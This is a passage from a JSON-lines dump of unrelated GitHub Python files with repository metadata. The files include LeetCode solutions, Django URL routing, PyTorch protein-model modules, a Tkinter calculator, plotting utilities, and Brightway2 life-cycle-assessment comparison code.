quickselect(pivot_index + 1, right, k_smallest)\n\n n = len(unique)\n # kth top frequent element is (n - k)th less frequent.\n # Do a partial sort: from less frequent to the most frequent, till\n # (n - k)th less frequent element takes its place (n - k) in a sorted array.\n # All element on the left are less frequent.\n # All the elements on the right are more frequent.\n quickselect(0, n - 1, n - k)\n # Return top k frequent elements\n return unique[n - k:]\n\n\nclass mycase(unittest.TestCase):\n def test01(self):\n self.assertEqual([1,2],get_sol().topKFrequent([1,1,1,2,2,3], 2))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc347.py","file_name":"lc347.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"36707665073","text":"from . import views\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom moonbling import settings\n\nurlpatterns = [\n path('', views.product_list, name='main'),\n path('shop/', views.product_list, name='product_list'),\n path('shop//', views.product_list, name='product_list_by_category'),\n path('shop//', views.product_detail, name='product_detail'),\n path('shop/about', views.about, name='about'),\n path('shop/contacts', views.contacts, name='contacts'),\n path('product_update/', views.product_update, name='product_update'),\n path('admin_logout/', views.admin_logout, name='admin_logout')\n ]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Melikhov-p/moonbling","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"45677948805","text":"import torch\r\nfrom einops import rearrange\r\nfrom torch import nn\r\n\r\nfrom protein_learning.networks.common.helpers.torch_utils import fused_gelu as NONLIN\r\nfrom protein_learning.networks.common.utils import default\r\nfrom protein_learning.networks.common.invariant.units import FeedForward\r\n\r\n\r\nclass FiberWeightedOut(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n fiber,\r\n nonlin=NONLIN,\r\n eps=1e-6, # TODO: changed from 1e-12\r\n include_order_stats=False,\r\n ):\r\n super().__init__()\r\n self.fiber = fiber\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.include_order_stats = include_order_stats\r\n dim0, dim1 = fiber.dims[0] + fiber.dims[1], fiber.dims[1]\r\n if include_order_stats:\r\n dim0 += 2 * fiber.dims[1]\r\n mid = (dim0 + dim1) // 2\r\n self.weight_net = nn.Sequential(\r\n nn.Linear(dim0, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, dim1),\r\n )\r\n\r\n def forward(self, features):\r\n output = {}\r\n norm = torch.norm(features['1'], dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n if self.include_order_stats:\r\n m, s = mean.unsqueeze(1), std.unsqueeze(1)\r\n m, s = m.expand_as(rel_norm), s.expand_as(rel_norm)\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm, m, s), dim=-1)\r\n else:\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp).unsqueeze(-1)\r\n output['0'] = features['0']\r\n output['1'] = torch.sum(features['1'] * weights, dim=-2, keepdim=True)\r\n return output\r\n\r\n\r\nclass WeightedOut(nn.Module):\r\n def __init__(\r\n self,\r\n coord_dim,\r\n feat_dim,\r\n coord_dim_out=1,\r\n nonlin=NONLIN,\r\n eps=1e-5,\r\n include_norms=True,\r\n n_hidden=1,\r\n ):\r\n super().__init__()\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.coord_dim_out = coord_dim_out\r\n self.coord_dim = coord_dim\r\n dim_in = coord_dim + feat_dim if include_norms else feat_dim\r\n mid, dim_out = max(128, dim_in), coord_dim * coord_dim_out\r\n self.weight_net = FeedForward(dim_in, mid, dim_out, n_hidden=n_hidden)\r\n\r\n def forward(self, coords, feats, return_feats=True):\r\n norm = torch.norm(coords, dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n inp = torch.cat((feats.squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp)\r\n weight_shape = (*weights.shape[:-1], self.coord_dim, self.coord_dim_out, 1)\r\n weights = weights.view(weight_shape)\r\n coords = coords.unsqueeze(-2)\r\n transformed_coords = torch.sum(coords * weights, dim=-3)\r\n\r\n if return_feats:\r\n return transformed_coords, feats\r\n else:\r\n return transformed_coords\r\n\r\n\r\nclass RadialFunc(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=None, nonlin=NONLIN,\r\n hidden_layer: bool = True, compress=False, dropout=0.0):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.edge_dim = default(edge_dim, 0)\r\n mid_dim = default(mid_dim, edge_dim)\r\n self.out_dim = out_dim\r\n bias = dropout > 0\r\n\r\n layer = lambda i, o, norm=True: nn.ModuleList([\r\n nn.Linear(i, o),\r\n nn.LayerNorm(o) if norm else nn.Identity,\r\n nonlin(),\r\n nn.Dropout(dropout) if dropout > 0 else nn.Identity()\r\n ])\r\n if not compress:\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim),\r\n *layer(mid_dim, mid_dim) if hidden_layer else nn.Identity(),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n else:\r\n mid_dim, code_dim = edge_dim // 2, edge_dim // 4\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim, norm=True),\r\n *layer(mid_dim, code_dim, norm=True),\r\n *layer(code_dim, mid_dim, norm=True),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n\r\n def forward(self, x):\r\n y = self.net(x)\r\n return rearrange(y, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n\r\n\r\nclass RadialKernel(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=128):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.out_dim = out_dim\r\n self.bin_embedding = nn.Embedding(34, num_freq * in_dim * out_dim)\r\n self._dist_bins = torch.arange(34)\r\n\r\n def dist_bins(self, device):\r\n if self._dist_bins.device != device:\r\n self._dist_bins = self._dist_bins.to(device)\r\n return self._dist_bins\r\n\r\n def forward(self, dists):\r\n print('in radial kernel')\r\n kernels = self.bin_embedding(self.dist_bins(dists.device))\r\n actual_bins = torch.round(torch.clamp((dists - 2.4) / 0.4, 0, 33)).long()\r\n kernels = kernels[actual_bins].squeeze(-2)\r\n return rearrange(kernels, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/networks/common/equivariant/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"}
+{"seq_id":"20139465408","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/maximum-level-sum-of-a-binary-tree/\n\nReturn the smallest level X such that the \nsum of all the values of nodes at level X is maximal.\n\"\"\"\n\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n def dfSearch(root: TreeNode, level: int, sums: List[int]=[]):\n if not root:\n return sums\n else:\n if level >= len(sums):\n sums.append(0)\n sums[level] += root.val\n dfSearch(root.left, level + 1, sums)\n dfSearch(root.right, level + 1, sums)\n return sums\n\n sums = dfSearch(root, 0)\n return sums.index(max(sums)) + 1","repo_name":"V-Wong/LeetCode","sub_path":"Tree/max_level_sum.py","file_name":"max_level_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"24220268211","text":"from tkinter import *\r\n\r\ndef evaluate(expression):\r\n operators = [\r\n \"+\",\r\n \"-\",\r\n \"x\",\r\n \"/\",\r\n \"^\"\r\n ]\r\n if expression.find(\"(\") != -1:\r\n if expression.count(\"(\") != expression.count(\")\"):\r\n return \"Error: syntax\"\r\n else:\r\n for x in range(expression.count(\"(\") + 1):\r\n openPar = expression.rfind(\"(\")\r\n closedPar = expression.find(\")\")\r\n \r\n\r\n\r\nbutton_values = [\r\n {\"row\": 1, \"col\": 0, \"value\": \"(\"},\r\n {\"row\": 1, \"col\": 1, \"value\": \")\"},\r\n {\"row\": 1, \"col\": 2, \"value\": \"AC\"},\r\n {\"row\": 1, \"col\": 3, \"value\": \"**\"},\r\n \r\n {\"row\": 2, \"col\": 0, \"value\": \"7\"},\r\n {\"row\": 2, \"col\": 1, \"value\": \"8\"},\r\n {\"row\": 2, \"col\": 2, \"value\": \"9\"},\r\n {\"row\": 2, \"col\": 3, \"value\": \"/\"},\r\n\r\n {\"row\": 3, \"col\": 0, \"value\": \"4\"},\r\n {\"row\": 3, \"col\": 1, \"value\": \"5\"},\r\n {\"row\": 3, \"col\": 2, \"value\": \"6\"},\r\n {\"row\": 3, \"col\": 3, \"value\": \"*\"},\r\n\r\n {\"row\": 4, \"col\": 0, \"value\": \"1\"},\r\n {\"row\": 4, \"col\": 1, \"value\": \"2\"},\r\n {\"row\": 4, \"col\": 2, \"value\": \"3\"},\r\n {\"row\": 4, \"col\": 3, \"value\": \"-\"},\r\n\r\n {\"row\": 5, \"col\": 0, \"value\": \"0\"},\r\n {\"row\": 5, \"col\": 1, \"value\": \".\"},\r\n {\"row\": 5, \"col\": 2, \"value\": \"=\"},\r\n {\"row\": 5, \"col\": 3, \"value\": \"+\"},\r\n]\r\n\r\nUSING_RPI = False\r\n\r\nclass MainGui(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n if USING_RPI:\r\n master.attributes(\"-fullscreen\", True)\r\n self.setupGui()\r\n\r\n def makeButton(self, row, col, value):\r\n bg_color = \"#cccccc\"\r\n if value == \"=\":\r\n bg_color = \"blue\"\r\n\r\n button = Button(\r\n self,\r\n font=(\"Helvetica\", 20),\r\n text=value,\r\n bg=bg_color,\r\n highlightbackground=bg_color,\r\n borderwidth=0,\r\n highlightthickness=0,\r\n width=5,\r\n activebackground=\"white\",\r\n command= lambda : self.handle_button_press(value)\r\n )\r\n button.grid(row=row, column=col, sticky=NSEW)\r\n\r\n def setupGui(self):\r\n self.display = Label(self, text=\"\", anchor=E, bg=\"white\", fg=\"black\", height=1, font=(\"Helvetica\", 30))\r\n self.display.grid(row=0, column=0, columnspan=4, sticky=NSEW)\r\n\r\n for row in range(6):\r\n Grid.rowconfigure(self, row, weight=1)\r\n for col in range(4):\r\n Grid.columnconfigure(self, col, weight=1)\r\n for button in button_values:\r\n self.makeButton(button[\"row\"], button[\"col\"], button[\"value\"])\r\n \r\n self.pack(fill=BOTH, expand=1)\r\n self.errored = False\r\n self.calculated = False\r\n\r\n def handle_button_press(self, buttonVal):\r\n display = self.display[\"text\"]\r\n clear = buttonVal == \"AC\"\r\n evaluate = buttonVal == \"=\"\r\n numeric = buttonVal in list(\"0123456789\")\r\n\r\n if clear:\r\n self.display[\"text\"] = \"\"\r\n return\r\n if evaluate:\r\n try:\r\n result = str(eval(display))\r\n self.display[\"text\"] = result\r\n self.calculated = True\r\n except:\r\n self.display[\"text\"] = \"ERROR\"\r\n self.errored = True\r\n return\r\n if self.errored and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.errored = False\r\n self.display[\"text\"] += buttonVal\r\n return\r\n if self.calculated and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.calculated = False\r\n self.display[\"text\"] = buttonVal\r\n self.display[\"text\"] += buttonVal\r\n self.calculated = False\r\n return\r\n\r\nwindow = Tk()\r\nwindow.title(\"Calculator\")\r\nr = MainGui(window)\r\nwindow.mainloop()\r\n\r\n\r\n\r\n \r\n","repo_name":"DanIsHere64/FunWithGit","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71198557173","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n###\n# Created Date: Thursday, August 22nd 2019, 9:25:01 am\n# Author: Charlene Leong leongchar@myvuw.ac.nz\n# Last Modified: Fri Sep 13 2019\n###\n\nimport numpy as np\nimport torch\n\nimport sklearn.metrics\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(font_scale=2)\n\nSEED = 489\n\ndef plt_scatter(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n ax = plt.subplot()\n ax.tick_params(axis='both', labelsize=10)\n \n if len(colors) == 0:\n plt.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n plt.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n plt.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n \n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name)\n\ndef plt_scatter_3D(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n\n fig = plt.figure()\n ax = Axes3D(fig)\n \n if len(colors) == 0:\n ax.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n ax.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n ax.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext, ztext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, ztext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n\n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name) \n \ndef plt_confusion_matrix(y_pred, y_target, output_dir, pltshow=False):\n confusion_matrix = sklearn.metrics.confusion_matrix(y_target, y_pred)\n\n plt.figure(figsize=(16, 14))\n sns.heatmap(confusion_matrix, annot=True, fmt='d', annot_kws={'size': 20})\n # plt.title('Confusion matrix', fontsize=10)\n plt.ylabel('True label', fontsize=20)\n plt.xlabel('Clustering label', fontsize=20)\n plt.savefig(output_dir+'/confusion_matrix.png', bbox_inches='tight')\n\n if pltshow:\n plt.show()\n\n return plt.imread(output_dir+'/confusion_matrix.png'), 'confusion_matrix.png'\n\n\ndef plt_clusters(output_dir, data, algorithm, args, kwds):\n fig = plt.figure()\n # start_time = time.time()\n labels = algorithm(*args, **kwds).fit_predict(data)\n # end_time = time.time()\n ax = plt.subplot()\n # ax.axis('tight')\n ax.tick_params(axis='both', labelsize=10)\n # labels_list = np.unique(labels)\n # palette = np.array(sns.color_palette('hls', len(labels_list)))\n palette = sns.color_palette('hls')\n colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n plt.scatter(data.T[0], data.T[1], c=colors, s=8, linewidths=1)\n # frame = plt.gca()\n # frame.axes.get_xaxis().set_visible(False)\n # frame.axes.get_yaxis().set_visible(False)\n plt.title('Clusters found by {}'.format(str(algorithm.__name__)), fontsize=14)\n #plt.text(-0.5, 0.7, 'Clustering took {:.2f} s'.format(end_time - start_time), fontsize=14)\n plt.savefig(output_dir)\n print ( '\\n saved image ', output_dir)\n plt.close(fig)\n return plt.imread(output_dir)\n\n\n ","repo_name":"charleneleong-ai/kun","sub_path":"models/utils/plt.py","file_name":"plt.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"10036489838","text":"import cv2\r\nimport numpy as np\r\nimg=cv2.imread('bw.png')\r\nheight=img.shape[0]\r\nwidth=img.shape[1]\r\nchannels=img.shape[2]\r\nimg2=np.zeros((height,width,channels),np.uint8)\r\n\r\n\r\nimg2=cv2.rectangle(img2,(130,0),(230,100),(255,255,255),-1)\r\n\r\nbitAnd=cv2.bitwise_xor(img,img2)\r\n\r\n\r\nprint(height)\r\nprint(width)\r\n\r\n\r\ncv2.imshow('image',img)\r\ncv2.imshow('image2', img2)\r\ncv2.imshow('image3',bitAnd)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Ricky-arch/OpenCV","sub_path":"bit_wise_operations_image.py","file_name":"bit_wise_operations_image.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6303267489","text":"\"\"\"定义Learning_logs的url模式\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Main page\n url(r'^$', views.index, name='index'),\n\n # Show all topics\n url(r'^topics/$', views.topics, name='topics'),\n\n # Special topic to show\n url(r'^topics/(?P\\d+)/$', views.topic, name='topic'),\n]","repo_name":"Snowstark/Learning_log","sub_path":"Learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71027169332","text":"#!/usr/bin/python3\n\n\n\"\"\"\nbase.py - This module contains the Base class\n\"\"\"\n\nimport json\nimport csv\nimport turtle\n\n\nclass Base:\n \"\"\"\n Base - The base class to manage the 'id' attribute\n \"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"\n Constructor for the Base class.\n\n Args:\n id (int, optional): The id to assign to the 'id' attribute\n \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"\n Convert a list of dictionaries to a JSON string representation.\n\n Args:\n list_dictionaries (list): A list of dictionaries.\n\n Returns:\n str: A JSON string representation of the list of dictionaries.\n \"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"\n Save a list of instances to a JSON file.\n\n Args:\n list_objs (list): A list of instances that inherit from Base.\n\n Note:\n The filename will be .json - example: Rectangle.json.\n If list_objs is None, an empty list will be saved\n The file will be overwritten if it already exists.\n \"\"\"\n filename = cls.__name__ + \".json\"\n if list_objs is None:\n list_objs = []\n list_dicts = [obj.to_dictionary() for obj in list_objs]\n json_string = cls.to_json_string(list_dicts)\n with open(filename, 'w') as file:\n file.write(json_string)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"\n Convert a JSON string representation to a list of dictionaries\n\n Args:\n json_string (str): A string representing a list of dictionaries.\n\n Returns:\n list: A list represented by json_string.\n \"\"\"\n if json_string is None or len(json_string) == 0:\n return []\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"\n Create an instance with all attributes already set.\n\n Args:\n **dictionary: A dictionary containing attribute names and values.\n\n Returns:\n object: An instance with all attributes set.\n \"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n elif cls.__name__ == \"Square\":\n dummy = cls(1)\n else:\n dummy = None\n\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"\n Load instances from a JSON file.\n\n Returns:\n list: A list of instances.\n \"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, 'r') as file:\n json_string = file.read()\n list_dicts = cls.from_json_string(json_string)\n return [cls.create(**dictionary) for dictionary in list_dicts]\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n if list_objs is None:\n list_objs = []\n filename = cls.__name__ + \".csv\"\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n for obj in list_objs:\n if cls.__name__ == \"Rectangle\":\n writer.writerow([obj.id, obj.width, obj.height, obj.x, obj.y])\n elif cls.__name__ == \"Square\":\n writer.writerow([obj.id, obj.size, obj.x, obj.y])\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, 'r', newline='') as file:\n reader = csv.reader(file)\n obj_list = []\n for row in reader:\n row = [int(val) for val in row]\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n obj.id, obj.width, obj.height, obj.x, obj.y = row\n elif cls.__name__ == \"Square\":\n obj = cls(1)\n obj.id, obj.size, obj.x, obj.y = row\n obj_list.append(obj)\n return obj_list\n except FileNotFoundError:\n return []\n\n @staticmethod\n def draw(list_rectangles, list_squares):\n screen = turtle.Screen()\n screen.bgcolor(\"white\")\n\n for rect in list_rectangles:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(rect.x, rect.y)\n t.pendown()\n for _ in range(2):\n t.forward(rect.width)\n t.left(90)\n t.forward(rect.height)\n t.left(90)\n\n for sq in list_squares:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(sq.x, sq.y)\n t.pendown()\n for _ in range(4):\n t.forward(sq.size)\n t.left(90)\n\n turtle.done()\n","repo_name":"billwk254/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8766503353","text":"def reverseString1(str):\n return str[::-1]\n\n# use stack to solve problem\ndef reverseString2(str):\n stack = []\n for ch in str:\n stack.append(ch)\n\n result = \"\"\n while len(stack) > 0:\n result += stack.pop()\n\n return result","repo_name":"leeyulkyu/giveMeAChance","sub_path":"reverseString.py","file_name":"reverseString.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36945657535","text":"import random\n\nclass Room():\n def __init__(self, room_id):\n self.room_id = room_id\n self.host_id = None\n self.users = []\n self.options = {\n 'ripple_time' : 3,\n 'cooldown' : 0,\n 'send_image' : True,\n 'show_id' : False,\n 'dark_mode' : False\n }\n \n @staticmethod\n def generate_hash(length):\n h = ''\n for _ in range(length):\n d = chr(random.randint(48,57))\n u = chr(random.randint(65,90))\n l = chr(random.randint(97,122))\n h += random.choice([d,u,l])\n return h\n\nif __name__ == '__main__':\n print(Room.generate_hash(5))\n","repo_name":"Tajam/ripple-diary","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29099589184","text":"import random\r\n\r\nsalaires = 12\r\nyear = 0\r\nlistesalaires = []\r\nshuffle = 0\r\n\r\nfor i in range(salaires):\r\n wallet = random.randint(0, 10000)\r\n print(wallet)\r\n if wallet < 5000:\r\n print(\"Vous avez moins de 5000 euros ce mois-ci\")\r\n elif wallet >= 5000:\r\n print(\"Vous avez 5000 euros ou plus!\")\r\n year += wallet\r\n listesalaires.append(year)\r\n\r\nprint(\"Cette année, vous avez eu \", year, \" euros !\")\r\nbinary = bin(year)\r\nprint(\"En binaire\", year,\" s'écrit \", binary, \" !\")\r\n\r\ndef rappel() :\r\n shuffle = random.randint(1, 2)\r\n if shuffle ==1:\r\n print(\"Voici la liste des salaires de cette année : \", listesalaires)\r\n elif shuffle ==2:\r\n random.shuffle(listesalaires)\r\n print(\"Voici la liste des salaires de cette année dans le désordre : \", listesalaires)\r\n\r\ndef longueur (a):\r\n print(\"Le mot contient\", len(a), \" caractères\")\r\n\r\nlongueur(\"Informatique\")\r\nrappel()\r\n","repo_name":"matteolg/nsiworks","sub_path":"matt.py","file_name":"matt.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42218079054","text":"import brightway2 as bw\nimport numpy as np\nimport pandas as pd\nimport itertools\n\nimport bokeh.io\nimport bokeh.plotting\nimport bokeh.models.tools\nimport bokeh.layouts\nimport bokeh.models\nfrom bokeh.palettes import Category10_10 as palette\nfrom bokeh.transform import dodge\n\n\n\n# bokeh constants\nwidth = 900\nheight = 300\n\n\ndef getILCDMethods():\n aoMethods = [m for m in bw.methods if \"ILCD\" in str(m) and \"2018\" in str(m) and \"LT\" not in str(m)]\n return aoMethods\n\ndef doLCA(oActivity, aoMethods, HHV=None):\n if HHV:\n functional_unit = {oActivity:1/HHV}\n else:\n functional_unit = {oActivity:1}\n oLCA = bw.LCA(functional_unit, aoMethods[0])\n oLCA.lci()\n oLCA.lcia()\n dScores = {aoMethods[0]:oLCA.score}\n for oMethod in aoMethods[1:]:\n oLCA.switch_method(oMethod)\n oLCA.lcia()\n dScores[oMethod] = oLCA.score\n return dScores, oLCA\n\n\ndef compareStaticLCA_interactive(dScores1, dScores2, sFileName=\"static_LCA_comparison.html\", legend1=None, legend2=None):\n\n # check if same methods have been used, abort if not\n if not dScores1.keys() == dScores2.keys():\n print(\"Methods are different. Comparison invalid.\")\n return\n\n # plot layout options\n bar_width = 0.5\n\n # extract method names, units\n ltMethods = [m for m in dScores1.keys()]\n lsUnits = [bw.Method(m).metadata[\"unit\"] for m in dScores1.keys()]\n lsNames = [\", \".join(bw.Method(m).name) for m in dScores1.keys()]\n lsMethodLabels = lsNames\n\n # normalized values\n normalized_v1 = np.array([np.sign(v) for v in dScores1.values()])\n normalized_v2 = np.array([np.sign(v2)*np.abs(v2/v1) for v1, v2 in zip(dScores1.values(), dScores2.values())])\n\n # bar labels = actual values\n lsBarLabels1 = [\"%.2e \" % v + unit for v, unit in zip(dScores1.values(), lsUnits)]\n lsBarLabels2 = [\"%.2e \" % v + unit for v, unit in zip(dScores2.values(), lsUnits)]\n\n # putting it all together\n source1 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v1,\n method=lsMethodLabels,\n value=lsBarLabels1,\n methods = ltMethods\n )\n )\n source2 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v2,\n method=lsMethodLabels,\n value=lsBarLabels2,\n methods = ltMethods\n )\n )\n\n TOOLTIPS = [\n (\"method\", \"@method\"),\n (\"value\", \"@value\")\n ]\n\n # plot\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='normalized impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*ltMethods))\n p1 = f.vbar(x=\"methods\", top=\"y\", width=bar_width, color=palette[0], alpha=0.6, source=source1)\n p2 = f.vbar(x=dodge('methods', bar_width/2, range=f.x_range), top=\"y\", width=bar_width, color=palette[1], alpha=0.6, source=source2)\n\n # build legend\n legend = bokeh.models.Legend(items=[\n (legend1, [p1]),\n (legend2, [p2]),\n ], location=\"center\", orientation=\"horizontal\", label_width=75)\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n pass\n\n\ndef plotContributionAnalysis(dContributions, sFileName, lsFromActivities=None, sDatabase=None, bLegend=True, fCutOff=0.005):\n\n oParentActivity = list(dContributions.values())[0][0][\"from\"][0]\n\n # find contributions, save in list\n ldMethodActContrib = []\n for oMethod, ldContributions in dContributions.items():\n\n # break down contributions to\n # a) direct contributions to parent activity if no names supplied\n # b) contributions from activities originating in databases which are not sDatabase\n # c) contributions of activities supplied by user, if names are given\n if lsFromActivities:\n direct_contributions = [c for c in ldContributions if c[\"from\"][-1][\"name\"] in lsFromActivities]\n elif sDatabase:\n direct_contributions = [\n c for c in ldContributions if (\n c[\"from\"][-1].get(\"database\",\"\") != sDatabase and\n c[\"to\"][-1].get(\"database\",\"\") == sDatabase and\n not bool(c[\"to\"][-1].get(\"aggregate\",False))\n ) or (\n bool(c[\"from\"][-1].get(\"aggregate\", False))\n )\n ]\n else:\n direct_contributions = [c for c in ldContributions if c[\"to\"] == [oParentActivity]]\n\n\n # save method name, activity name, relative contribution to impact in dictionary\n fuGetName = lambda x: \\\n (x[\"from\"][-1][\"database\"] == \"biosphere3\") * x[\"to\"][-1][\"name\"] +\\\n (x[\"from\"][-1][\"database\"] != \"biosphere3\") * x[\"from\"][-1][\"name\"]\n ld = [{\n 